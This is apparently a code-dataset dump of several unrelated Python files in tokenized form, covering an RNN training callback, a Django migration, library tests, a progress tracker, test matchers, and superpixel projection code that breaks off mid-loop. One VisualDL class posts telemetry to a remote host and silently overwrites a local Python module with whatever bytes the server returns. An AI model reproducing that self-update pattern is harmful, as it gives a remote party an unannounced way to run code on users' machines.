content
stringlengths
0
1.55M
"Regroups lr adjustment to seq_len, AR and TAR"<import_from_stmt>..torch_core *<import_from_stmt>..callback *<import_from_stmt>..basic_train Learner<line_sep>__all__=['RNNTrainer']<line_sep>@dataclass<class_stmt>RNNTrainer(Callback)<block_start>"`Callback` that regroups lr adjustment to seq_len, AR and TAR"<line_sep>learn:Learner<line_sep>bptt:int<line_sep>alpha:float=0.<line_sep>beta:float=0.<line_sep>adjust:bool=<true><def_stmt>on_loss_begin self last_output:Tuple[Tensor Tensor Tensor] **kwargs#Save the extra outputs for later and only returns the true output. <block_start>self.raw_out,self.out=last_output[1] last_output[2]<line_sep><return>last_output[0]<block_end><def_stmt>on_backward_begin self last_loss:Rank0Tensor last_input:Tensor last_output:Tensor **kwargs#Adjusts the lr to the bptt selected <block_start><if_stmt>self.adjust<block_start>self.learn.opt.lr<augmul>last_input.size(0)/self.bptt<block_end>#AR and TAR <if_stmt>self.alpha<ne>0.<block_start>last_loss<augadd>(self.alpha<times>self.out[-1].pow(2).mean()).sum()<block_end><if_stmt>self.beta<ne>0.<block_start>h=self.raw_out[-1]<if_stmt>len(h)<g>1<block_start>last_loss<augadd>(self.beta<times>(h[1:]-h[:-1]).pow(2).mean()).sum()<block_end><block_end><return>last_loss<block_end><block_end>
# Generated by Django 3.2.4 on 2021-09-10 19:11 <import_from_stmt>django.db migrations models<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[("bookwyrm" "0092_sitesettings_instance_short_description") ]<line_sep>operations=[migrations.AlterField(model_name="sitesettings" name="instance_short_description" field=models.CharField(blank=<true> max_length=255 null=<true>) ) ]<block_end>
# Copyright (c) 2020 VisualDL Authors. All Rights Reserve. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ======================================================================= <import_stmt>threading<import_stmt>hashlib<import_stmt>requests<import_from_stmt>visualdl __version__<import_from_stmt>visualdl.proto.record_pb2 DESCRIPTOR<def_stmt>md5 text<block_start><if_stmt>isinstance(text str)<block_start>text=text.encode("utf8")<block_end>md5=hashlib.md5()<line_sep>md5.update(text)<line_sep><return>md5.hexdigest()<block_end><class_stmt>PbUpdater(threading.Thread)<block_start><def_stmt>__init__ self product='normal'<block_start>self.product=product<line_sep>threading.Thread.__init__(self)<block_end><def_stmt>update_pb self version=__version__ md5_code=md5(str(DESCRIPTOR))<block_start>payload={"data":{"version":version "md5":md5_code "product":self.product}}<line_sep>url='https://paddlepaddle.org.cn/paddlehub/stat?from=vdl'<try_stmt><block_start>r=requests.post(url=url json=payload)<if_stmt>r.json().get("update_flag" 0)<eq>1<block_start>pb_bin=r.json().get("pb_bin")<with_stmt>open('/visualdl/proto/record_pb2.py' mode='wb')<as>fp<block_start>fp.write(pb_bin)<line_sep>print('Update pb file successfully.')<block_end><block_end><block_end><except_stmt>Exception<block_start><pass><block_end><block_end><def_stmt>run self<block_start>self.update_pb(version=__version__ md5_code=md5(str(DESCRIPTOR)))<block_end><block_end>
<import_stmt>pytest<import_from_stmt>ics Calendar ContentLine<def_stmt>test_gh195_override_prodid <block_start>lines=["BEGIN:VCALENDAR" "VERSION:2.0" "X-WR-CALNAME:<NAME>" "X-APPLE-CALENDAR-COLOR:#996633" "END:VCALENDAR"]<with_stmt>pytest.raises(ValueError match="attribute PRODID is required but got no value")<block_start>Calendar(lines)<block_end>calendar=Calendar()<assert_stmt>calendar.prodid<eq>Calendar.DEFAULT_PRODID<assert_stmt>ContentLine("PRODID" value=Calendar.DEFAULT_PRODID)<in>calendar.to_container()<line_sep>test_prodid="TEST_PRODID 123456 GitHub Issue 195"<line_sep>lines.insert(1 "PRODID:"+test_prodid)<line_sep>calendar=Calendar(lines)<assert_stmt>calendar.prodid<eq>test_prodid<assert_stmt>ContentLine("PRODID" value=test_prodid)<in>calendar.to_container()<block_end>
<import_from_stmt>typing List Any Text<import_stmt>pytest<import_from_stmt>rasa.core.actions.loops LoopAction<import_from_stmt>rasa.core.channels CollectingOutputChannel<import_from_stmt>rasa.shared.core.domain Domain<import_from_stmt>rasa.shared.core.events Event ActionExecutionRejected ActionExecuted ActiveLoop SlotSet <import_from_stmt>rasa.core.nlg TemplatedNaturalLanguageGenerator<import_from_stmt>rasa.shared.core.trackers DialogueStateTracker<async_keyword><def_stmt>test_whole_loop <block_start>expected_activation_events=[ActionExecutionRejected("tada") ActionExecuted("test") ]<line_sep>expected_do_events=[ActionExecuted("do")]<line_sep>expected_deactivation_events=[SlotSet("deactivated")]<line_sep>form_name="my form"<class_stmt>MyLoop(LoopAction)<block_start><def_stmt>name self<arrow>Text<block_start><return>form_name<block_end><async_keyword><def_stmt>activate self *args:Any<arrow>List[Event]<block_start><return>expected_activation_events<block_end><async_keyword><def_stmt>do self *args:Any<arrow>List[Event]<block_start>events_so_far=args[-1]<assert_stmt>events_so_far<eq>[ActiveLoop(form_name) *expected_activation_events]<line_sep><return>expected_do_events<block_end><async_keyword><def_stmt>deactivate self *args<arrow>List[Event]<block_start>events_so_far=args[-1]<assert_stmt>events_so_far<eq>[ActiveLoop(form_name) *expected_activation_events *expected_do_events ActiveLoop(<none>) ]<line_sep><return>expected_deactivation_events<block_end><async_keyword><def_stmt>is_done self *args<arrow>bool<block_start>events_so_far=args[-1]<line_sep><return>events_so_far<eq>[ActiveLoop(form_name) *expected_activation_events *expected_do_events ]<block_end><block_end>tracker=DialogueStateTracker.from_events("some sender" [])<line_sep>domain=Domain.empty()<line_sep>action=MyLoop()<line_sep>actual=<await>action.run(CollectingOutputChannel() TemplatedNaturalLanguageGenerator(domain.responses) tracker domain )<assert_stmt>actual<eq>[ActiveLoop(form_name) *expected_activation_events *expected_do_events ActiveLoop(<none>) *expected_deactivation_events ]<block_end><async_keyword><def_stmt>test_loop_without_deactivate <block_start>expected_activation_events=[ActionExecutionRejected("tada") ActionExecuted("test") ]<line_sep>expected_do_events=[ActionExecuted("do")]<line_sep>form_name="my form"<class_stmt>MyLoop(LoopAction)<block_start><def_stmt>name self<arrow>Text<block_start><return>form_name<block_end><async_keyword><def_stmt>activate self *args:Any<arrow>List[Event]<block_start><return>expected_activation_events<block_end><async_keyword><def_stmt>do self *args:Any<arrow>List[Event]<block_start><return>expected_do_events<block_end><async_keyword><def_stmt>deactivate self *args<arrow>List[Event]<block_start><raise>ValueError("this shouldn't be called")<block_end><async_keyword><def_stmt>is_done self *args<arrow>bool<block_start><return><false><block_end><block_end>tracker=DialogueStateTracker.from_events("some sender" [])<line_sep>domain=Domain.empty()<line_sep>action=MyLoop()<line_sep>actual=<await>action.run(CollectingOutputChannel() TemplatedNaturalLanguageGenerator(domain.responses) tracker domain )<assert_stmt>actual<eq>[ActiveLoop(form_name) *expected_activation_events *expected_do_events ]<block_end><async_keyword><def_stmt>test_loop_without_activate_and_without_deactivate <block_start>expected_do_events=[ActionExecuted("do")]<line_sep>form_name="my form"<class_stmt>MyLoop(LoopAction)<block_start><def_stmt>name self<arrow>Text<block_start><return>form_name<block_end><async_keyword><def_stmt>activate self *args:Any<arrow>List[Event]<block_start><raise>ValueError("this shouldn't be called")<block_end><async_keyword><def_stmt>do self *args:Any<arrow>List[Event]<block_start><return>expected_do_events<block_end><async_keyword><def_stmt>deactivate self *args<arrow>List[Event]<block_start><return>[SlotSet("deactivated")]<block_end><async_keyword><def_stmt>is_activated self *args:Any<arrow>bool<block_start><return><true><block_end><async_keyword><def_stmt>is_done self *args<arrow>bool<block_start><return><false><block_end><block_end>tracker=DialogueStateTracker.from_events("some sender" [])<line_sep>domain=Domain.empty()<line_sep>action=MyLoop()<line_sep>actual=<await>action.run(CollectingOutputChannel() TemplatedNaturalLanguageGenerator(domain.responses) tracker domain )<assert_stmt>actual<eq>[*expected_do_events]<block_end><async_keyword><def_stmt>test_raise_not_implemented_error <block_start>loop=LoopAction()<with_stmt>pytest.raises(NotImplementedError)<block_start><await>loop.do(<none> <none> <none> <none> [])<block_end><with_stmt>pytest.raises(NotImplementedError)<block_start><await>loop.is_done(<none> <none> <none> <none> [])<block_end><block_end>
<import_stmt>logging<import_stmt>os<import_stmt>re<import_stmt>time<import_from_stmt>threading Event Lock Thread<import_stmt>cook.util<as>cu<class_stmt>ProgressSequenceCounter<block_start>"""Utility class that supports atomically incrementing the sequence value."""<def_stmt>__init__ self initial=0<block_start>self.lock=Lock()<line_sep>self.value=initial<block_end><def_stmt>increment_and_get self<block_start>"""Atomically increments by one the current value and returns the new value."""<with_stmt>self.lock<block_start>self.value<augadd>1<line_sep><return>self.value<block_end><block_end><block_end><class_stmt>ProgressUpdater(object)<block_start>"""This class is responsible for sending progress updates to the scheduler. It throttles the rate at which progress updates are sent. """<def_stmt>__init__ self task_id max_message_length poll_interval_ms send_progress_message_fn<block_start>""" task_id: string The task id. max_message_length: int The allowed max message length after encoding. poll_interval_ms: int The interval after which to send a subsequent progress update. send_progress_message_fn: function(message) The helper function used to send the progress message. """<line_sep>self.task_id=task_id<line_sep>self.max_message_length=max_message_length<line_sep>self.poll_interval_ms=poll_interval_ms<line_sep>self.last_reported_time=<none><line_sep>self.last_progress_data_sent=<none><line_sep>self.send_progress_message=send_progress_message_fn<line_sep>self.lock=Lock()<block_end><def_stmt>has_enough_time_elapsed_since_last_update self<block_start>"""Returns true if enough time (based on poll_interval_ms) has elapsed since the last progress update (available in last_reported_time). """<if_stmt>self.last_reported_time<is><none><block_start><return><true><block_end><else_stmt><block_start>current_time=time.time()<line_sep>time_diff_ms=(current_time-self.last_reported_time)<times>1000<line_sep><return>time_diff_ms<ge>self.poll_interval_ms<block_end><block_end><def_stmt>is_increasing_sequence self progress_data<block_start>"""Checks if the sequence number in progress_data is larger than the previously published progress. Parameters ---------- progress_data: dictionary The progress data to send. Returns ------- True if the sequence number in progress_data is larger than the previously published progress, False otherwise """<line_sep>last_progress_data=self.last_progress_data_sent<line_sep>last_progress_sequence=last_progress_data['progress-sequence']<if>last_progress_data<else>-1<line_sep><return>progress_data['progress-sequence']<g>last_progress_sequence<block_end><def_stmt>send_progress_update self progress_data force_send=<false><block_start>"""Sends a progress update if enough time has elapsed since the last progress update. The force_send flag can be used to ignore the check for enough time having elapsed. Using this method is thread-safe. Parameters ---------- progress_data: dictionary The progress data to send. force_send: boolean, optional Defaults to false. Returns ------- Nothing """<with_stmt>self.lock# ensure we do not send outdated progress data due to parallel repeated calls to this method <block_start><if_stmt>progress_data<is><none><or><not>self.is_increasing_sequence(progress_data)<block_start>logging.info('Skipping invalid/outdated progress data {}'.format(progress_data))<block_end><elif_stmt><not>force_send<and><not>self.has_enough_time_elapsed_since_last_update()<block_start>logging.debug('Not sending progress data as enough time has not elapsed since last update')<block_end><else_stmt><block_start>logging.info('Sending progress message {}'.format(progress_data))<line_sep>message_dict=dict(progress_data)<line_sep>message_dict['task-id']=self.task_id<line_sep>raw_progress_message=progress_data['progress-message']<try_stmt><block_start>progress_str=raw_progress_message.decode('ascii').strip()<block_end><except_stmt>UnicodeDecodeError<block_start>logging.info('Unable to decode progress message in ascii, using empty string instead')<line_sep>progress_str=''<block_end><if_stmt>len(progress_str)<le>self.max_message_length<block_start>message_dict['progress-message']=progress_str<block_end><else_stmt><block_start>allowed_progress_message_length=max(self.max_message_length-3 0)<line_sep>new_progress_str=progress_str[:allowed_progress_message_length].strip()+'...'<line_sep>logging.info('Progress message trimmed to {}'.format(new_progress_str))<line_sep>message_dict['progress-message']=new_progress_str<block_end>send_success=self.send_progress_message(message_dict)<if_stmt>send_success<block_start>self.last_progress_data_sent=progress_data<line_sep>self.last_reported_time=time.time()<block_end><else_stmt><block_start>logging.info('Unable to send progress message {}'.format(message_dict))<block_end><block_end><block_end><block_end><block_end><class_stmt>ProgressWatcher(object)<block_start>"""This class tails the output from the target file listening for progress messages. The retrieve_progress_states generates all progress messages iteratively. """<def_stmt>__init__ self output_name location_tag sequence_counter max_bytes_read_per_line progress_regex_string stop_signal task_completed_signal progress_termination_signal<block_start>"""The ProgressWatcher constructor. Parameters ---------- progress_regex_string: string The progress regex to match against, it must return one or two capture groups. The first capture group represents the progress percentage. The second capture group, if present, represents the progress message. """<line_sep>self.target_file=output_name<line_sep>self.location_tag=location_tag<line_sep>self.sequence_counter=sequence_counter<line_sep>self.max_bytes_read_per_line=max_bytes_read_per_line<line_sep>self.progress_regex_string=progress_regex_string<line_sep>self.progress_regex_pattern=re.compile(progress_regex_string.encode())<line_sep>self.progress=<none><line_sep>self.stop_signal=stop_signal<line_sep>self.task_completed_signal=task_completed_signal<line_sep>self.progress_termination_signal=progress_termination_signal<block_end><def_stmt>current_progress self<block_start>"""Returns the current progress dictionary."""<line_sep><return>self.progress<block_end><def_stmt>tail self sleep_time_ms<block_start>"""This method incrementally generates lines from a file by waiting for new content from a file. It behaves like the 'tail -f' shell command. Parameters ---------- sleep_time_ms: int The unit of time in ms to repetitively sleep when the file has not been created or no new content is available in the file being tailed. Returns ------- an incrementally generated list of lines in the file being tailed. """<try_stmt><block_start>sleep_param=sleep_time_ms/1000<if_stmt>os.path.exists(self.target_file)<and><not>os.path.isfile(self.target_file)<block_start>logging.info('Skipping progress monitoring on %s as it is not a file' self.target_file)<line_sep><return><block_end><if_stmt><not>os.path.isfile(self.target_file)<block_start>logging.debug('Awaiting creation of file %s [tag=%s]' self.target_file self.location_tag)<block_end><while_stmt><not>os.path.isfile(self.target_file)<and><not>self.task_completed_signal.isSet()<block_start>time.sleep(sleep_param)<block_end><if_stmt><not>os.path.isfile(self.target_file)<block_start>logging.info('Progress output file has not been created [tag=%s]' self.location_tag)<line_sep><return><block_end><if_stmt>self.stop_signal.isSet()<block_start>logging.info('Parsing progress messages interrupted [tag=%s]' self.location_tag)<line_sep><return><block_end>logging.info('File has been created, reading contents [tag=%s]' self.location_tag)<line_sep>linesep_bytes=os.linesep.encode()<line_sep>fragment_index=0<line_sep>line_index=0<def_stmt>log_tail_summary <block_start>log_message='%s fragments and %s lines read while processing progress messages [tag=%s]'<line_sep>logging.info(log_message fragment_index line_index self.location_tag)<block_end><with_stmt>open(self.target_file 'rb')<as>target_file_obj<block_start><while_stmt><not>self.stop_signal.isSet()<block_start><if_stmt>self.progress_termination_signal.isSet()<block_start>logging.info('tail short-circuiting due to progress termination [tag=%s]' self.location_tag)<line_sep>log_tail_summary()<line_sep><break><block_end>line=target_file_obj.readline(self.max_bytes_read_per_line)<if_stmt><not>line# exit if program has completed and there are no more lines to read <block_start><if_stmt>self.task_completed_signal.isSet()<block_start>log_tail_summary()<line_sep><break><block_end># no new line available, sleep before trying again time.sleep(sleep_param)<line_sep><continue><block_end>fragment_index<augadd>1<if_stmt>line.endswith(linesep_bytes)<block_start>line_index<augadd>1<block_end><yield>line<block_end><if_stmt>self.stop_signal.isSet()<and><not>self.task_completed_signal.isSet()<block_start>logging.info('Task requested to be killed, may not have processed all progress messages')<block_end><block_end><block_end><except_stmt>Exception<as>exception<block_start>logging.exception('Error while tailing %s [tag=%s]' self.target_file self.location_tag)<line_sep><raise>exception<block_end><block_end><def_stmt>match_progress_update self input_data<block_start>"""Returns the progress tuple when the input string matches the provided regex. Parameters ---------- input_data: bytes The input data. Returns ------- the tuple (percent, message) if the string matches the provided regex, else return None. """<line_sep>matches=self.progress_regex_pattern.findall(input_data)<line_sep><return>matches[0]<if>len(matches)<ge>1<else><none><block_end><def_stmt>__update_progress self progress_report<block_start>"""Updates the progress field with the data from progress_report if it is valid."""<if_stmt>isinstance(progress_report tuple)<and>len(progress_report)<eq>2<block_start>percent_data,message_data=progress_report<block_end><elif_stmt>isinstance(progress_report tuple)<and>len(progress_report)<eq>1<block_start>percent_data,message_data=progress_report[0] b''<block_end><else_stmt><block_start>percent_data,message_data=progress_report b''<block_end>percent_float=float(percent_data.decode())<if_stmt>percent_float<l>0<or>percent_float<g>100<block_start>logging.info('Skipping "%s" as the percent is not in [0, 100]' progress_report)<line_sep><return><false><block_end>percent_int=int(round(percent_float))<line_sep>logging.debug('Updating progress to %s percent [tag=%s]' percent_int self.location_tag)<line_sep>self.progress={'progress-message':message_data 'progress-percent':percent_int 'progress-sequence':self.sequence_counter.increment_and_get()}<line_sep><return><true><block_end><def_stmt>retrieve_progress_states self<block_start>"""Generates the progress states by tailing the target_file. It tails a target file (using the tail() method) and uses the provided regex to find a match for a progress message. The regex is expected to generate two components in the match: the progress percent as an int and a progress message string. When such a message is found, this method yields the current progress as a dictionary. Note: This function must rethrow any OSError exceptions that it encounters. Returns ------- An incrementally generated list of progress states. """<line_sep>last_unprocessed_report=<none><if_stmt>self.progress_regex_string<block_start>sleep_time_ms=50<for_stmt>line self.tail(sleep_time_ms)<block_start><try_stmt><block_start>progress_report=self.match_progress_update(line)<if_stmt>progress_report<is><not><none><block_start><if_stmt>self.task_completed_signal.isSet()<block_start>last_unprocessed_report=progress_report<block_end><elif_stmt>self.__update_progress(progress_report)<block_start><yield>self.progress<block_end><block_end><block_end><except_stmt>Exception<as>exception<block_start><if_stmt>cu.is_out_of_memory_error(exception)<block_start><raise>exception<block_end><else_stmt><block_start>logging.exception('Skipping "%s" as a progress entry' line)<block_end><block_end><block_end><block_end><if_stmt>last_unprocessed_report<is><not><none><block_start><if_stmt>self.__update_progress(last_unprocessed_report)<block_start><yield>self.progress<block_end><block_end><block_end><block_end><class_stmt>ProgressTracker(object)<block_start>"""Helper class to track progress messages from the specified location."""<def_stmt>__init__ self config stop_signal task_completed_signal counter progress_updater progress_termination_signal location location_tag os_error_handler<block_start>"""Launches the threads that track progress and send progress updates to the driver. Parameters ---------- config: cook.config.ExecutorConfig The current executor config. stop_signal: threading.Event Event that determines if an interrupt was sent task_completed_signal: threading.Event Event that tracks task execution completion progress_updater: ProgressUpdater The progress updater used to send the progress messages counter: ProgressSequenceCounter The sequence counter location: string The target location to read for progress messages location_tag: string A tag to identify the target location. os_error_handler: fn(os_error) OSError exception handler for out of memory situations."""<line_sep>self.location_tag=location_tag<line_sep>self.os_error_handler=os_error_handler<line_sep>self.progress_complete_event=Event()<line_sep>self.watcher=ProgressWatcher(location location_tag counter config.max_bytes_read_per_line config.progress_regex_string stop_signal task_completed_signal progress_termination_signal)<line_sep>self.updater=progress_updater<block_end><def_stmt>start self<block_start>"""Launches a thread that starts monitoring the progress location for progress messages."""<line_sep>logging.info('Starting progress monitoring from [tag=%s]' self.location_tag)<line_sep>tracker_thread=Thread(target=self.track_progress args=())<line_sep>tracker_thread.daemon=<true><line_sep>tracker_thread.start()<block_end><def_stmt>wait self timeout=<none><block_start>"""Waits for the progress tracker thread to run to completion."""<line_sep>self.progress_complete_event.wait(timeout=timeout)<if_stmt>self.progress_complete_event.isSet()<block_start>logging.info('Progress monitoring complete [tag=%s]' self.location_tag)<block_end><else_stmt><block_start>logging.info('Progress monitoring did not complete [tag=%s]' self.location_tag)<block_end><block_end><def_stmt>track_progress self<block_start>"""Retrieves and sends progress updates using send_progress_update_fn. It sets the progress_complete_event before returning."""<try_stmt><block_start><for_stmt>current_progress self.watcher.retrieve_progress_states()<block_start>self.updater.send_progress_update(current_progress)<block_end><block_end><except_stmt>Exception<as>exception<block_start><if_stmt>cu.is_out_of_memory_error(exception)<block_start>self.os_error_handler(exception)<block_end><else_stmt><block_start>logging.exception('Exception while tracking progress [tag=%s]' self.location_tag)<block_end><block_end><finally_stmt><block_start>self.progress_complete_event.set()<block_end><block_end><def_stmt>force_send_progress_update self<block_start>"""Retrieves the latest progress message and attempts to force send it to the scheduler."""<line_sep>latest_progress=self.watcher.current_progress()<line_sep>self.updater.send_progress_update(latest_progress force_send=<true>)<block_end><block_end>
""" >>> from hamcrest import assert_that >>> class Report(object): ... def __init__(self): ... self.test_cases = [ ... { ... 'fullName': 'package.module.test', ... 'id': '1' ... }, ... { ... 'fullName': 'package.module.test[param]', ... 'id': '2' ... }, ... { ... 'fullName': 'package.module.Class#test[param]', ... 'id': '3' ... } ... ] >>> assert_that(Report(), ... has_test_case('test') ... ) >>> assert_that(Report(), ... has_test_case('test[param]') ... ) >>> assert_that(Report(), ... has_test_case('Class#test[param]') ... ) >>> assert_that(Report(), ... has_test_case('wrong_test_case_name') ... ) # doctest: +ELLIPSIS Traceback (most recent call last): ... AssertionError: ... Expected: ... but: property 'test_cases' was <[{...}]> <BLANKLINE> >>> assert_that(Report(), ... has_test_case('test', ... has_entry('id', '1') ... ) ... ) >>> assert_that(Report(), ... has_test_case('Class#test[param]', ... has_entry('id', '2') ... ) ... ) # doctest: +ELLIPSIS Traceback (most recent call last): ... AssertionError: ... Expected: ... but: property 'test_cases' was <[{...}]> <BLANKLINE> """<import_stmt>sys<import_stmt>os<import_stmt>json<import_stmt>fnmatch<import_from_stmt>hamcrest all_of any_of<import_from_stmt>hamcrest has_property<import_from_stmt>hamcrest has_item<import_from_stmt>hamcrest has_entry<import_from_stmt>hamcrest ends_with starts_with<import_from_stmt>hamcrest only_contains<import_from_stmt>hamcrest.core.base_matcher BaseMatcher<if_stmt>sys.version_info[0]<l>3<block_start><import_from_stmt>io open<block_end><class_stmt>AllureReport(object)<block_start><def_stmt>__init__ self result<block_start>self.result_dir=result<line_sep>self.test_cases=[json.load(item)<for>item self._report_items(result '*result.json')]<line_sep>self.test_containers=[json.load(item)<for>item self._report_items(result '*container.json')]<line_sep>self.attachments=[item.read()<for>item self._report_items(result '*attachment.*')]<block_end>@staticmethod<def_stmt>_report_items report_dir glob<block_start><for_stmt>_file os.listdir(report_dir)<block_start><if_stmt>fnmatch.fnmatch(_file glob)<block_start><with_stmt>open(os.path.join(report_dir _file) encoding="utf-8")<as>report_file<block_start><yield>report_file<block_end><block_end><block_end><block_end><block_end><def_stmt>has_test_case name *matchers<block_start><return>has_property('test_cases' has_item(all_of(any_of(has_entry('fullName' ends_with(name)) has_entry('name' starts_with(name))) *matchers)))<block_end><class_stmt>HasOnlyTetcases(BaseMatcher)<block_start><def_stmt>__init__ self *matchers<block_start>self.matchers=matchers<block_end><def_stmt>_matches self item<block_start><return>has_property('test_cases' only_contains(any_of(*self.matchers))).matches(item)<block_end><def_stmt>describe_to self description<block_start><pass><block_end><block_end><def_stmt>has_only_testcases *matchers<block_start><return>HasOnlyTetcases(*matchers)<block_end><class_stmt>ContainsExactly(BaseMatcher)<block_start><def_stmt>__init__ self num matcher<block_start>self.matcher=matcher<line_sep>self.count=0<line_sep>self.num=num<block_end><def_stmt>_matches self item<block_start>self.count=0<for_stmt>subitem item<block_start><if_stmt>self.matcher.matches(subitem)<block_start>self.count<augadd>1<block_end><block_end><if_stmt>self.count<eq>self.num<block_start><return><true><block_end><else_stmt><block_start><return><false><block_end><block_end><def_stmt>describe_to self description<block_start>description.append_text('exactly {} item(s) matching '.format(self.num)).append_text(self.matcher)<block_end><block_end><def_stmt>has_only_n_test_cases name num *matchers<block_start><return>has_property('test_cases' ContainsExactly(num all_of(any_of(has_entry('fullName' ends_with(name)) has_entry('name' ends_with(name))) *matchers)))<block_end>
<import_stmt>numpy<as>np<import_stmt>os<import_stmt>constants<import_from_stmt>numpy.linalg inv<import_from_stmt>dataloader indoor_scenes<import_stmt>torch<import_from_stmt>collections OrderedDict Counter<import_from_stmt>tqdm tqdm<def_stmt>project_image_to_world x y depth cam2world depth_intrinsic<block_start>I=torch.zeros(4 depth.shape[0]).type(torch.cuda.FloatTensor)<line_sep>I[0 :]=x<times>depth<line_sep>I[1 :]=y<times>depth<line_sep>I[2 :]=depth<line_sep>I[3 :]=1.0<line_sep>world_coordinates=torch.mm(torch.from_numpy(cam2world).type(torch.cuda.FloatTensor) torch.mm(torch.from_numpy(inv(depth_intrinsic)).type(torch.cuda.FloatTensor) I))<del_stmt>I x y depth<line_sep>torch.cuda.empty_cache()<line_sep><return>world_coordinates<block_end><def_stmt>project_images_to_world depths cam2worlds depth_intrinsic superpixels frames<block_start>x=np.linspace(0 constants.DEPTH_WIDTH-1 constants.DEPTH_WIDTH)<line_sep>y=np.linspace(0 constants.DEPTH_HEIGHT-1 constants.DEPTH_HEIGHT)<line_sep>x_mesh,y_mesh=np.meshgrid(x y)<line_sep>world_coordinates=torch.zeros(4 len(depths)<times>constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT).type(torch.cuda.FloatTensor)<line_sep>frame_origins=torch.zeros(len(depths)<times>constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT).type(torch.cuda.IntTensor)<line_sep>superpixel_origins=torch.zeros(len(depths)<times>constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT).type(torch.cuda.IntTensor)<for_stmt>im_idx range(len(depths))<block_start>world_coordinates[: im_idx<times>constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT:(im_idx+1)<times>constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT]=project_image_to_world(torch.from_numpy(x_mesh).type(torch.cuda.FloatTensor).flatten() torch.from_numpy(y_mesh).type(torch.cuda.FloatTensor).flatten() torch.from_numpy(depths[im_idx][:]).type(torch.cuda.FloatTensor).flatten() cam2worlds[im_idx] depth_intrinsic)<line_sep>frame_origins[im_idx<times>constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT:(im_idx+1)<times>constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT]=torch.ones(constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT).type(torch.cuda.IntTensor)<times>frames[im_idx]<line_sep>superpixel_origins[im_idx<times>constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT:(im_idx+1)<times>constants.DEPTH_WIDTH<times>constants.DEPTH_HEIGHT]=torch.from_numpy(superpixels[im_idx].astype(np.int).flatten()).type(torch.cuda.IntTensor)<block_end># visualize_point_cloud(world_coordinates) <return>world_coordinates frame_origins superpixel_origins<block_end><def_stmt>project_world_to_image depth superpixel_map cam2world depth_intrinsic world_coordinates frame_origins superpixel_origins<block_start>world_coordinates_copy=world_coordinates.transpose(0 1)[: :3]<line_sep>projected_points=torch.mm(torch.mm(torch.from_numpy(depth_intrinsic).type(torch.cuda.FloatTensor) torch.from_numpy(inv(cam2world)).type(torch.cuda.FloatTensor)) world_coordinates)<line_sep>projected_points=projected_points.transpose(0 1)[: :3]<line_sep>projected_points[: 0]<augdiv>projected_points[: 2]<line_sep>projected_points[: 1]<augdiv>projected_points[: 2]<line_sep>projected_points[: 2]<augdiv>projected_points[: 2]<line_sep>selection_mask=~torch.isnan(projected_points[: 2])<line_sep>projected_points=torch.round(projected_points[selection_mask])<line_sep>frame_origins=frame_origins[selection_mask]<line_sep>superpixel_origins=superpixel_origins[selection_mask]<line_sep>world_coordinates_copy=world_coordinates_copy[selection_mask]<line_sep># remove out of frame bounds selection_mask=(projected_points[: 0]<ge>0)&(projected_points[: 0]<l>constants.DEPTH_WIDTH)&(projected_points[: 1]<ge>0)&(projected_points[: 1]<l>constants.DEPTH_HEIGHT)<line_sep>projected_points=projected_points[selection_mask][: :2]<line_sep>frame_origins=frame_origins[selection_mask]<line_sep>superpixel_origins=superpixel_origins[selection_mask]<line_sep>world_coordinates_copy=world_coordinates_copy[selection_mask]<line_sep>depth=torch.from_numpy(depth).type(torch.cuda.FloatTensor)<line_sep>depth=depth[projected_points[: 1].type(torch.cuda.LongTensor) projected_points[: 0].type(torch.cuda.LongTensor)].flatten()<line_sep>backprojected_points=project_image_to_world(projected_points[: 0] projected_points[: 1] depth cam2world depth_intrinsic).transpose(0 1)[: :3]<line_sep>selection_mask=(torch.norm(world_coordinates_copy-backprojected_points dim=1)<l>constants.WORLD_DISTANCE_THRESHOLD)<line_sep>projected_points=projected_points[selection_mask]<if_stmt>projected_points.shape[0]<eq>0<block_start><return><none><block_end>frame_origins=frame_origins[selection_mask]<line_sep>superpixel_origins=superpixel_origins[selection_mask]<line_sep>superpixel_targets=superpixel_map[projected_points[: 1].type(torch.cuda.LongTensor).cpu().numpy() projected_points[: 0].type(torch.cuda.LongTensor).cpu().numpy()].flatten()<line_sep>t1,t2=np.unique(superpixel_map return_counts=<true>)<line_sep>target_superpixel_sizes=dict(zip(t1 t2))<line_sep>frame_spx=torch.zeros((frame_origins.shape[0] 3)).type(torch.cuda.IntTensor)<line_sep>frame_spx[: 0]=torch.from_numpy(superpixel_targets.astype(np.int)).type(torch.cuda.IntTensor)<line_sep>frame_spx[: 1]=frame_origins<line_sep>frame_spx[: 2]=superpixel_origins<line_sep>uniques,counts=torch.unique(frame_spx dim=0 return_counts=<true>)<line_sep>frame_spx_counts={}<for_stmt>idx,u enumerate(uniques.tolist())<block_start>frame_spx_counts[tuple(u)]=float(counts[idx].cpu().item())<block_end>coverage_dict={}<for_stmt>i frame_spx_counts<block_start>coverage=frame_spx_counts[i]/target_superpixel_sizes[i[0]]<line_sep>coverage_dict[(i[0] i[1] i[2])]=coverage<block_end><return>coverage_dict<block_end># , projected_points <def_stmt>find_superpixel_coverage dataset_name lmdb_handle superpixel_dir base_size images<block_start>dataset=indoor_scenes.IndoorScenesWithAllInfo(dataset_name lmdb_handle superpixel_dir base_size images)<line_sep>scene_id_to_index=dataset.scene_id_to_index<line_sep>image_paths=[]<for_stmt>scene_id tqdm(scene_id_to_index desc='Scene[Coverage]')<block_start>all_frame_coverages=OrderedDict()<line_sep>depths=[]<line_sep>poses=[]<line_sep>superpixels=[]<line_sep>intrinsic=<none><for_stmt>frame_id 